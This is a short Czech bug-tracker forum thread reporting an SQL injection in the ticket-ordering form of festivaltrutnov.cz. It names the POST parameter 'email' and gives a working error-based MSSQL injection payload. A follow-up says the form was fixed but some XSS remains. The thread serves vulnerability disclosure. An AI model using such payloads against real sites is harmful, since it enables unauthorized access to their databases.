SQLi - festivaltrutnov.cz
BugTrack
SQLi - festivaltrutnov.cz | # |
| SQLi rovnou na formuláři pro objednání vstupenek ..
[link]
Parameter Name: email
Parameter Type: Post
Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR (50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101 )+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
vice chyb: [link]
(odpovědět) | Mrmla | 104.41.204.* | 12.5.2016 1:38 |
|
|
|
re: SQLi - festivaltrutnov.cz | # |
| Na webu sice ještě nějaké XSS, ale jinak formulář opraven. (odpovědět) | Mrmla | 185.97.214.* | 6.7.2016 16:42 |
|
|
|